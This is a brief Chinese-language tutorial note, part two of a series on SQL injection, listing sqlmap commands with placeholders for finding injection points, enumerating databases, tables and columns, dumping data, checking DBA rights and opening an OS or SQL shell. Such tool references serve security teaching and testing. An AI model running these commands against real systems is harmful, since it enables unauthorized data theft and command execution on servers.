SQL注入 (二)

二、注入工具

Sqlmap的使用

---

检测注入点：sqlmap -u [URL路径]
查询数据库：sqlmap -u [URL路径] --dbs
查询所有表：sqlmap -u [URL路径] -D [数据库名] --tables
查询所有列：sqlmap -u [URL路径] -D [数据库名] -T [表名] --columns
查询表数据：sqlmap -u [URL路径] -D [数据库名] -T [表名] -C [列名, ..., ...] --dump

检测root/sa：sqlmap -u [URL路径] --is-dba
执行os-shell：sqlmap -u [URL路径] [关键字]
[关键字]：--os-shell 或者 --sql-shell 或者 --os-cmd="[win命令]" (os-shell | os-cmd)执行系统命令，sql-shell执行sql语句。